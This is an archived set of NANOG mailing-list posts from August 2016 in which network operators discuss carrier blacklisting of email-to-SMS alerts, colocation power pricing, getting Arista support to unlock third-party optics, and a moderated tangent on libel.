Scott

From josh at imaginenetworksllc.com Wed Aug 17 14:53:21 2016
From: josh at imaginenetworksllc.com (Josh Luthman)
Date: Wed, 17 Aug 2016 10:53:21 -0400
Subject: Email to text - vtext.com blacklisting ip
In-Reply-To:
References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>
Message-ID:

Just a heads up to everyone with these suggestions, Mike is complaining the thought of using a paid service for a "critical" function to be a waste of bandwidth. He will then block your email address.

Just thought I'd save everyone's time from trying to help him. He is only concerned about fixing the free service and not a solution to the problem.

Josh Luthman
Office: 937-552-2340
Direct: 937-552-2343
1100 Wayne St
Suite 1337
Troy, OH 45373

On Aug 17, 2016 10:48 AM, "Scott Fisher" wrote:

> This subject pops up every 6 months and it's a problem that can be solved
> 100 ways. One way we did it at Team Cymru was install a foxbox sms gateway
> in our datacenter. It was a pain to get working, (mainly due to some
> miscommunication with the Italian support team), but one we got past a few
> problems it works flawlessly for all alerts. If alerts are unack'd for a
> specific amount of time, escalation alerts go out via email-to-sms AND SMS
> to a broader group to ensure someone gets the message.
>
> Thanks,
> Scott

From mel at beckman.org Wed Aug 17 15:09:30 2016
From: mel at beckman.org (Mel Beckman)
Date: Wed, 17 Aug 2016 15:09:30 +0000
Subject: Email to text - vtext.com blacklisting ip
In-Reply-To:
References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>
Message-ID:

That's fine. The surrounding discussion is likely helpful to other nanogen.

-mel

> On Aug 17, 2016, at 7:53 AM, Josh Luthman wrote:
>
> Just a heads up to everyone with these suggestions, Mike is complaining the
> thought of using a paid service for a "critical" function to be a waste of
> bandwidth. He will then block your email address.
>
> Just thought I'd save everyone's time from trying to help him. He is only
> concerned about fixing the free service and not a solution to the problem.
>
> Josh Luthman
> Office: 937-552-2340
> Direct: 937-552-2343
> 1100 Wayne St
> Suite 1337
> Troy, OH 45373
>
> On Aug 17, 2016 10:48 AM, "Scott Fisher" wrote:
>
>> This subject pops up every 6 months and it's a problem that can be solved
>> 100 ways. One way we did it at Team Cymru was install a foxbox sms gateway
>> in our datacenter. It was a pain to get working, (mainly due to some
>> miscommunication with the Italian support team), but one we got past a few
>> problems it works flawlessly for all alerts. If alerts are unack'd for a
>> specific amount of time, escalation alerts go out via email-to-sms AND SMS
>> to a broader group to ensure someone gets the message.
>>
>> Thanks,
>> Scott
>>
>> On Wed, Aug 17, 2016 at 5:31 AM, Dovid Bender wrote:
>>
>>> We use Zang.io and are very happy. Be careful when using long codes (10
>>> digit numbers) as if you send too many messages out in a day (500+) the
>>> larger carriers such as Verizon will start blocking you. As Jeff
>> mentioned
>>> if your monitoring tool is onsite and the internet goes down then it's
>>> worthless.
In our case it's in another DC so if everything goes down we
>>> still get alerts. You can also try twilio and telnyx.

From eric.kuhnke at gmail.com Wed Aug 17 16:37:55 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Wed, 17 Aug 2016 09:37:55 -0700
Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit
Message-ID:

a) How much, in $/mo

b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 generator, single UPS, 1+1 UPS, etc).

c) What extent of diversity were you able to obtain vs. your other AC circuits (unique riser? separate transformer? separate power feed from second route into the building?)

From patrick at ianai.net Wed Aug 17 16:41:57 2016
From: patrick at ianai.net (Patrick W.
Gilmore)
Date: Wed, 17 Aug 2016 12:41:57 -0400
Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit
In-Reply-To:
References:
Message-ID: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net>

L6-30s are probably the most common power drop in colocation.

A) Is proprietary. I won't pretend you will get zero answers, lots of people will likely break their NDAs.

B) You can find any and all of those options.

C) Ditto.

Are you looking for specific cities or buildings? Or just trying to see if it is available?

--
TTFN,
patrick

> On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote:
>
> a) How much, in $/mo
>
> b) To what degree is it protected (1+0 generator, 1+1 generator, N+1
> generator, single UPS, 1+1 UPS, etc).
>
> c) What extent of diversity were you able to obtain vs. your other AC
> circuits (unique riser? separate transformer? separate power feed from
> second route into the building?)

From eric.kuhnke at gmail.com Wed Aug 17 16:48:22 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Wed, 17 Aug 2016 09:48:22 -0700
Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit
In-Reply-To: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net>
References: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net>
Message-ID:

Of course I know all of the above exist and are available. Looking more into the cost difference between facilities that sell 'basic' backed power (where you absolutely need to install your own rectifier and battery plant) vs facilities that sell 30A circuits they claim meet the definition of high availability.

I have seen a lot of prices already and know that just the $/MRC for power is occasionally not under NDA, so those who wish to share their costs might do so in a general way without naming a specific facility...

Looking at west coast states (CA/OR/WA) primarily.

On Wed, Aug 17, 2016 at 9:41 AM, Patrick W. Gilmore wrote:

> L6-30s are probably the most common power drop in colocation.
>
> A) Is proprietary. I won't pretend you will get zero answers, lots of
> people will likely break their NDAs.
>
> B) You can find any and all of those options.
>
> C) Ditto.
>
> Are you looking for specific cities or buildings? Or just trying to see if
> it is available?
>
> --
> TTFN,
> patrick

From keiths at neilltech.com Wed Aug 17 16:55:30 2016
From: keiths at neilltech.com (Keith Stokes)
Date: Wed, 17 Aug 2016 16:55:30 +0000
Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit
In-Reply-To:
References: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net>
Message-ID: <5D8E99EF-D6B0-47BB-9D2E-66086EA7F8B1@neilltech.com>

We're grandfathered to power being available with rack, and $hundreds to $thousands per month for 208V/30A HA depending upon the facility.

These sites are not West Coast.

On Aug 17, 2016, at 11:48 AM, Eric Kuhnke > wrote:

Of course I know all of the above exist and are available. Looking more into the cost difference between facilities that sell 'basic' backed power (where you absolutely need to install your own rectifier and battery plant) vs facilities that sell 30A circuits they claim meet the definition of high availability.

I have seen a lot of prices already and know that just the $/MRC for power is occasionally not under NDA, so those who wish to share their costs might do so in a general way without naming a specific facility...

Looking at west coast states (CA/OR/WA) primarily.

---
Keith Stokes

From dhubbard at dino.hostasaurus.com Wed Aug 17 18:13:54 2016
From: dhubbard at dino.hostasaurus.com (David Hubbard)
Date: Wed, 17 Aug 2016 18:13:54 +0000
Subject: Email to text - vtext.com blacklisting ip
In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>
References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>
Message-ID:

We'd experienced similar, plus, email to text doesn't work if the path between alerting system and email gateway is broken. We bought a few of these cellular gateways:

http://www.smseagle.eu/

Then I went into a t-mobile store and bought a few $25/mo SIM cards, put credit card on file to auto renew each month, slapped them in, and pointed our NMS's at them. Now we can send SMS alerts from each facility and have had no reliability issues. There's an easy to write for http interface, and many common things, like Zabbix or Nagios, already have modules written.

David

On 8/16/16, 7:33 PM, "NANOG on behalf of Sam Norris" wrote:

Same boat... We are sending messages to PHONENUMBER at vtext.com and getting bouncebacks or lost items. I assume its because some limits are now being put into place. We are a Verizon subscriber so I am paying, it is not a free service. But ....
I am totally up for paid services if you can recommend some that will reliably get us texts to our verizon phones. Sam > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > Sent: Tuesday, August 16, 2016 4:17 PM > To: Josh Luthman; Mike > Cc: NANOG list > Subject: RE: Email to text - vtext.com blacklisting ip > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free service > for anything critical is asking for trouble. > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > -------- Original message -------- > From: Josh Luthman > Date: 8/16/16 6:09 PM (GMT-05:00) > To: Mike > Cc: NANOG list > Subject: Re: Email to text - vtext.com blacklisting ip > > If it's critical I'd suggest a service than can depended on... > > Josh Luthman > Office: 937-552-2340 > Direct: 937-552-2343 > 1100 Wayne St > Suite 1337 > Troy, OH 45373 > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > Hi, > > > > > > I have a server that monitors my network and issues text messages if > > there are events of note that require human intervention. There is some > > process filtering that ensures it also is not able to issue more than 1 > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > messages all screaming the sky is falling when things are not going well. > > Recently however, this server is no longer able to deliver messages to > > vtext.com - it gets nothing but 554 errors: > > > > > > telnet 69.78.67.53 25 > > Trying 69.78.67.53... > > Connected to 69.78.67.53. > > Escape character is '^]'. > > 554 txslspamp10.vtext.com > > Connection closed by foreign host. > > > > Granted on some days during challenging times it can send 30 or 40 > > messages before we get to it and get it squelched / silenced, but it's > > otherwise reasonably well behaved IMHO and I don't think we are any heavy > > volume sender. So I am trying to figure out why it's blacklisted then and > > am rolling snake eyes. 
If anyone who is an admin for verizon or who has > > any insight to share I'd certainly appreciate it. Email to text is a > > critical function we depend on. > > > > > > Thank you. > > > > > > From me at nek0.net Wed Aug 17 19:50:12 2016 From: me at nek0.net (Stanislaw) Date: Wed, 17 Aug 2016 22:50:12 +0300 Subject: Arista unqualified SFP Message-ID: Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From sryan at arbor.net Wed Aug 17 19:52:51 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Wed, 17 Aug 2016 19:52:51 +0000 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: Yes, email support and ask for the unlock code, they will make you agree that you know that 3rd party optics may explode the switch and it's not their fault. The command they give you will have a key/hash built into it (but will work on any switch) that ties the "unlock" to your org. 
Ours looks like this: service unsupported-transceiver DescriptionOfKeyFromAristaGoesHere 0000000000 (hex key) Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Stanislaw Sent: Wednesday, August 17, 2016 3:50:12 PM To: nanog at nanog.org Subject: Arista unqualified SFP Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From jackson.tim at gmail.com Wed Aug 17 19:57:24 2016 From: jackson.tim at gmail.com (Tim Jackson) Date: Wed, 17 Aug 2016 14:57:24 -0500 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: I'd suggest bitching and moaning at your account team & support until they give you the key to unlock them.. -- Tim On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: > Hi all, > Is there a way for unlocking off-brand transceivers usage on Arista > switches? > > I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been > found out that Arista switches seem to not have possibility to unlock > off-brand xcievers usage (by some service command or so). > > I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the > checking function bypass the actual check and it helped: ports are not in > errdisable state anymore. 
But despite of xceivers are detected correctly, > links aren't coming up (they are in notconnect state). > > If anyone possibly have does have a sacred knowledge of bringing > off-branded transceivers to life on Arista switches, your help'd be very > appreciated. Thanks. > From eric at lumaoptics.net Wed Aug 17 20:17:15 2016 From: eric at lumaoptics.net (Eric Litvin) Date: Wed, 17 Aug 2016 13:17:15 -0700 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: <9F5BF45A-2595-41E4-B780-32B476741B08@lumaoptics.net> Let me know if you want samples. We can ship today. > On Aug 17, 2016, at 12:50 PM, Stanislaw wrote: > > Hi all, > Is there a way for unlocking off-brand transceivers usage on Arista switches? > > I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). > > I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). > > If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From me at nek0.net Wed Aug 17 20:25:47 2016 From: me at nek0.net (Stanislaw) Date: Wed, 17 Aug 2016 23:25:47 +0300 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Hi Tim, Thanks for your expressive answer. Will try it :) Tim Jackson wrote 2016-08-17 22:57: > I'd suggest bitching and moaning at your account team & support until they give you the key to unlock them.. > > -- > Tim > > On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: > >> Hi all, >> Is there a way for unlocking off-brand transceivers usage on Arista switches?
>> >> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). >> >> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). >> >> If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From ryan.dirocco at totalserversolutions.com Wed Aug 17 20:33:12 2016 From: ryan.dirocco at totalserversolutions.com (Ryan DiRocco) Date: Wed, 17 Aug 2016 20:33:12 +0000 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: Exactly this, get your unlock key that is tied to your company and you are off to the races, bake it into your standard config. Your SE or support team should be able to get this to you :) -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer Sent: Wednesday, August 17, 2016 3:53 PM To: Stanislaw; nanog at nanog.org Subject: Re: Arista unqualified SFP Yes, email support and ask for the unlock code, they will make you agree that you know that 3rd party optics may explode the switch and it's not their fault. The command they give you will have a key/hash built into it (but will work on any switch) that ties the "unlock" to your org. 
Ours looks like this: service unsupported-transceiver DescriptionOfKeyFromAristaGoesHere 0000000000 (hex key) Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Stanislaw Sent: Wednesday, August 17, 2016 3:50:12 PM To: nanog at nanog.org Subject: Arista unqualified SFP Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From dhubbard at dino.hostasaurus.com Wed Aug 17 20:39:54 2016 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Wed, 17 Aug 2016 20:39:54 +0000 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: We've done this as well, and Arista support hasn't hassled us about anything yet so I've been pleased. I've been very happy using Flexoptics transceivers in all kinds of equipment too, if anyone's looking for something they know works, and you get a programmer that will let you code optics to certain vendors switches that don't have unlock keys. It won't work on all though, so investigate before investing if that's a concern. David On 8/17/16, 4:33 PM, "NANOG on behalf of Ryan DiRocco" wrote: Exactly this, get your unlock key that is tied to your company and you are off to the races, bake it into your standard config.
Your SE or support team should be able to get this to you :) -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer Sent: Wednesday, August 17, 2016 3:53 PM To: Stanislaw; nanog at nanog.org Subject: Re: Arista unqualified SFP Yes, email support and ask for the unlock code, they will make you agree that you know that 3rd party optics may explode the switch and it's not their fault. The command they give you will have a key/hash built into it (but will work on any switch) that ties the "unlock" to your org. Ours looks like this: service unsupported-transceiver DescriptionOfKeyFromAristaGoesHere 0000000000 (hex key) Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Stanislaw Sent: Wednesday, August 17, 2016 3:50:12 PM To: nanog at nanog.org Subject: Arista unqualified SFP Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. 
From lists at mtin.net Wed Aug 17 22:20:38 2016 From: lists at mtin.net (Justin Wilson) Date: Wed, 17 Aug 2016 18:20:38 -0400 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: References: Message-ID: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Indiana Data Centers: $600-900 per lit rack Chicago $1800 per lit rack Ohio $700-900 per lit rack Justin Wilson j2sw at mtin.net --- http://www.mtin.net Owner/CEO xISP Solutions- Consulting - Data Centers - Bandwidth http://www.midwest-ix.com COO/Chairman Internet Exchange - Peering - Distributed Fabric > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > a) How much, in $/mo > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > generator, single UPS, 1+1 UPS, etc). > > c) What extent of diversity were you able to obtain vs. your other AC > circuits (unique riser? separate transformer? separate power feed from > second route into the building?) > From josh at kyneticwifi.com Wed Aug 17 22:37:12 2016 From: josh at kyneticwifi.com (Josh Reynolds) Date: Wed, 17 Aug 2016 17:37:12 -0500 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> References: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Message-ID: Assuming a single 208/30 feed, he also asked about redundancy. On Aug 17, 2016 5:23 PM, "Justin Wilson" wrote: > Indiana Data Centers: > $600-900 per lit rack > > > Chicago > $1800 per lit rack > > > Ohio > $700-900 per lit rack > > > Justin Wilson > j2sw at mtin.net > > --- > http://www.mtin.net Owner/CEO > xISP Solutions- Consulting - Data Centers - Bandwidth > > http://www.midwest-ix.com COO/Chairman > Internet Exchange - Peering - Distributed Fabric > > > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > > > a) How much, in $/mo > > > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > > generator, single UPS, 1+1 UPS, etc).
> > > > c) What extent of diversity were you able to obtain vs. your other AC > > circuits (unique riser? separate transformer? separate power feed from > > second route into the building?) > > > > From jhall at futuresouth.us Wed Aug 17 23:11:59 2016 From: jhall at futuresouth.us (Jonathan Hall) Date: Thu, 18 Aug 2016 01:11:59 +0200 Subject: Zayo Extortion In-Reply-To: <56221.1471438917@turing-police.cc.vt.edu> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> <56221.1471438917@turing-police.cc.vt.edu> Message-ID: <8CF557E0-9451-4C11-924C-0AC6F2E4080B@futuresouth.us> Guys, Actually, thank you for the responses. I was hoping you wouldn't take my attempt at friendly and humorous conversation the wrong way. I appreciate the education on the topic, as well. :) However, I'd like to ask a few questions on it, if you don't mind? (Also - you're right, it's not the freedom of speech act I'm thinking, wasn't it some form of "decency act" ? I digress, though?) For something to actually be considered libel, isn't it required that the statement be untrue, damaging in a way that must be proven and actually knowingly false? Proving damages would be hard? But putting that aside, proving what he is saying is not true (unless it's just 100% false and they have recorded evidence of it) might be even harder if they don't have proper records of past due balances, or properly recorded communications (i.e. email). And where is the line drawn with regards to him/her knowingly making statements that are not true? And wouldn't it still also require a general purpose public figure, or a limited purpose public figure, to prove malice in the instance? I don't think the company would qualify as a general or limited purpose public figure. That would pretty much apply to actors, performer and/or social activist types - or politicians. Not a service provider?
If he perceives it to be extortion, then it would be difficult to say that him claiming extortion is libel. The definition of extortion is the general practice of obtaining something, especially money, through the use of force or threats. In this case, the company is using the threat of disconnection as the force, and they are indeed attempting to collect money. So, if we take it from a literal definitive view of "extortion," the word, by definition, fits the scenario. It doesn't imply wrong doing, really, and could be applicable to any and every service provider in existence today - even the pharmaceutical companies with regards to withholding medication that can save lives unless absurd amounts of money is paid. I'd say the entire world could be classified as extortionists if we go by the actual definition. J > On 17 Aug 2016, at 15:01, Valdis.Kletnieks at vt.edu wrote: > > On Wed, 17 Aug 2016 01:11:09 +0200, Jonathan Hall said: >> And either way, defamation requires some form of punitive damage be proven in >> order to actually win that case. > > In addition to the other things already pointed out, punitive damage doesn't > need to be proven. > > *Actual* damages have to be proven. Punitive damages are damages added > as punishment, to make sure the responsible party learned their lesson. > > So for instance, if a corporation's negligence results in a worker's death, > his family may be awarded $5M in actual damages for the loss of their loved > one - and then another $20 million in punitive damages, to make the corporation > (and possibly the industry segment as a whole) take notice that sort of > negligent behavior will not be tolerated....
> From job at instituut.net Wed Aug 17 23:22:33 2016 From: job at instituut.net (Job Snijders) Date: Thu, 18 Aug 2016 01:22:33 +0200 Subject: Zayo Extortion In-Reply-To: <8CF557E0-9451-4C11-924C-0AC6F2E4080B@futuresouth.us> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> <56221.1471438917@turing-police.cc.vt.edu> <8CF557E0-9451-4C11-924C-0AC6F2E4080B@futuresouth.us> Message-ID: <20160817232233.GK47197@vurt.meerval.net> Dear nanog, I'm asking the group to stay focussed on network operator topics. While I appreciate the time and effort spent on the original legal research in this thread, I fear the problem space of what defines libel or slander is too far removed from the mailing list charter as described here: https://www.nanog.org/list Thanks! Kind regards, Job From eric.kuhnke at gmail.com Wed Aug 17 23:23:39 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Wed, 17 Aug 2016 16:23:39 -0700 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: References: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Message-ID: And the price difference between the many possibly varying levels of redundancy. On Aug 17, 2016 3:38 PM, "Josh Reynolds" wrote: > Assuming a single 208/30 feed, he also asked about redundancy. > > On Aug 17, 2016 5:23 PM, "Justin Wilson" wrote: > > > Indiana Data Centers: > > $600-900 per lit rack > > > > > > Chicago > > $1800 per lit rack > > > > > > Ohio > > $700-900 per lit rack > > > > > > Justin Wilson > > j2sw at mtin.net > > > > --- > > http://www.mtin.net Owner/CEO > > xISP Solutions- Consulting -
Data Centers - Bandwidth > > > > http://www.midwest-ix.com COO/Chairman > > Internet Exchange - Peering - Distributed Fabric > > > > > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke > wrote: > > > > > > a) How much, in $/mo > > > > > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > > > generator, single UPS, 1+1 UPS, etc). > > > > > > c) What extent of diversity were you able to obtain vs. your other AC > > > circuits (unique riser? separate transformer? separate power feed > from > > > second route into the building?) > > > > > > > > From me at nek0.net Thu Aug 18 10:24:05 2016 From: me at nek0.net (Stanislaw) Date: Thu, 18 Aug 2016 13:24:05 +0300 Subject: Arista unqualified SFP In-Reply-To: <22a54cac8cc717f87acfedf74e146cae@nek0.net> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Message-ID: Hi all, If somebody is following my epic adventure of getting uqualified SFP to work on Aristas, here is the unhappy end of it. I've written to Arista support and got the following dialogue: Support guy: Hi, Thank you for contacting Arista Support. My name is **** and I'll be assisting you on this case. Could you please provide the "show version" output from this switch? Me: Hi, Here it is: Support guy: Hi, Thank you for the information. Unfortunately, we are unable to activate your 3rd party components. To ensure ongoing quality, Arista devices are designed to support only properly qualified transceivers. Please let me know if you have any other questions. Me: I do not understand, But there is a command which allows using non-Arista transceivers. Why have you implemented it but don't provide an access key to your customers when they ask for it? If it is required to sign some papers which declare that I am aware of all the risks and losing my warranty - I agree with that, lets do it. Any way what are the conditions to receive that access key? Support guy: I'm afraid that there is nothing I'm able to do regarding this situation. 
If you have any other questions regarding enabling 3rd party options in Arista switches, I suggest to contact your local account team (or sales) for further discussion on this matter. Next, i've tried inserting various QSFP+ DAC cables I have - none of them has been even detected on the switch, it was acting like nothing has been inserted. I guess that even if I get the key, most of my transceivers/DAC (which work like a champ in Juniper or Extreme switches) cables wouldnt work. I'm writing this post to make somebody who considers buying their switches be aware of what they'd get. Just buy Juniper instead. Stanislaw wrote at 2016-08-17 23:25: > Hi Tim, > > Thanks for your expressive answer. Will try it :) > > Tim Jackson wrote 2016-08-17 22:57: > >> I'd suggest bitching and moaning at your account team & support until >> they give you the key to unlock them.. >> >> -- >> Tim >> >> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >> >>> Hi all, >>> Is there a way for unlocking off-brand transceivers usage on Arista >>> switches? >>> >>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>> been found out that Arista switches seem to not have possibility to >>> unlock off-brand xcievers usage (by some service command or so). >>> >>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>> checking function bypass the actual check and it helped: ports are >>> not in errdisable state anymore. But despite of xceivers are detected >>> correctly, links aren't coming up (they are in notconnect state). >>> >>> If anyone possibly have does have a sacred knowledge of bringing >>> off-branded transceivers to life on Arista switches, your help'd be >>> very appreciated. Thanks.
From dovid at telecurve.com Thu Aug 18 11:29:17 2016 From: dovid at telecurve.com (Dovid Bender) Date: Thu, 18 Aug 2016 11:29:17 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Message-ID: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> And I was about to jump on to the Arista train..... Regards, Dovid -----Original Message----- From: Stanislaw Sender: "NANOG" Date: Thu, 18 Aug 2016 13:24:05 To: nanog list Subject: Re: Arista unqualified SFP Hi all, If somebody is following my epic adventure of getting uqualified SFP to work on Aristas, here is the unhappy end of it. I've written to Arista support and got the following dialogue: Support guy: Hi, Thank you for contacting Arista Support. My name is **** and I'll be assisting you on this case. Could you please provide the "show version" output from this switch? Me: Hi, Here it is: Support guy: Hi, Thank you for the information. Unfortunately, we are unable to activate your 3rd party components. To ensure ongoing quality, Arista devices are designed to support only properly qualified transceivers. Please let me know if you have any other questions. Me: I do not understand, But there is a command which allows using non-Arista transceivers. Why have you implemented it but don't provide an access key to your customers when they ask for it? If it is required to sign some papers which declare that I am aware of all the risks and losing my warranty - I agree with that, lets do it. Any way what are the conditions to receive that access key? Support guy: I'm afraid that there is nothing I'm able to do regarding this situation. If you have any other questions regarding enabling 3rd party options in Arista switches, I suggest to contact your local account team (or sales) for further discussion on this matter. 
Next, i've tried inserting various QSFP+ DAC cables I have - none of them has been even detected on the switch, it was acting like nothing has been inserted. I guess that even if I get the key, most of my transceivers/DAC (which work like a champ in Juniper or Extreme switches) cables wouldnt work. I'm writing this post to make somebody who considers buying their switches be aware of what they'd get. Just buy Juniper instead. Stanislaw wrote at 2016-08-17 23:25: > Hi Tim, > > Thanks for your expressive answer. Will try it :) > > Tim Jackson wrote 2016-08-17 22:57: > >> I'd suggest bitching and moaning at your account team & support until >> they give you the key to unlock them.. >> >> -- >> Tim >> >> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >> >>> Hi all, >>> Is there a way for unlocking off-brand transceivers usage on Arista >>> switches? >>> >>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>> been found out that Arista switches seem to not have possibility to >>> unlock off-brand xcievers usage (by some service command or so). >>> >>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>> checking function bypass the actual check and it helped: ports are >>> not in errdisable state anymore. But despite of xceivers are detected >>> correctly, links aren't coming up (they are in notconnect state). >>> >>> If anyone possibly have does have a sacred knowledge of bringing >>> off-branded transceivers to life on Arista switches, your help'd be >>> very appreciated. Thanks.
